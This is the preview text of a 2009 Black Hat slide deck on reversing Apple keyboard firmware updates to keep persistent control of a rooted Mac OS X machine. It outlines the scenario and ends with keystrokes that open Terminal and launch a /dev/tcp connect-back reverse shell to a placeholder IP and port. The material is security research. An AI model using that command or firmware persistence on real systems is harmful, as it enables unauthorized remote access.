
Reversing and Exploiting an Apple Firmware Update - Black Hat PDF

190 Pages·2009·5.13 MB·English
by K. Chen

Preview Reversing and Exploiting an Apple Firmware Update - Black Hat

Reversing and Exploiting an Apple Firmware Update
K. Chen
Black Hat USA, July 30th, 2009

1 Introduction
    Motivation
    Keyboard control
    Apple’s keyboards
    Firmware bugs
2 Firmware Update
3 Analysis
4 Exploitation

Scenario (post-exploitation):
    We’ve rooted somebody’s Mac OS X box
        Say after reading “The Mac Hacker’s Handbook” by Charlie Miller and Dino Dai Zovi
    We want to maintain control of the box
http://upload.wikimedia.org/wikipedia/en/1/1f/Sad_mac.png

Proof-of-concept rootkit
    “iRK - Crafting OS X Kernel Rootkits” by Jesse D’Aguanno (Black Hat 2008)
We want to maintain control, even if
    Apple releases patch for vulnerability we used
    Owner is paranoid and re-installs Mac OS X from clean media
    Owner safely updates patch level

Fortunately for an attacker
    Apple has a habit of releasing products before they’re ready
    Apple then later issues firmware updates
    In May 2009, almost 1000 firmware updates available for download from support.apple.com
    The Mac world is incredibly monocultural

http://support.apple.com/downloads/

Apple has firmware updates available for:
    graphics cards
    keyboards
    trackpads
    bluetooth
    EFI
    SuperDrive
    AirPort products
    Time Capsule
    etc.

What can we do with control of the keyboard?
http://www.flickr.com/photos/errorsan/164315682/

How about shoveling a shell?
    1 Command - Space
    2 terminal
    3 Return
    4 exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0 Return
http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
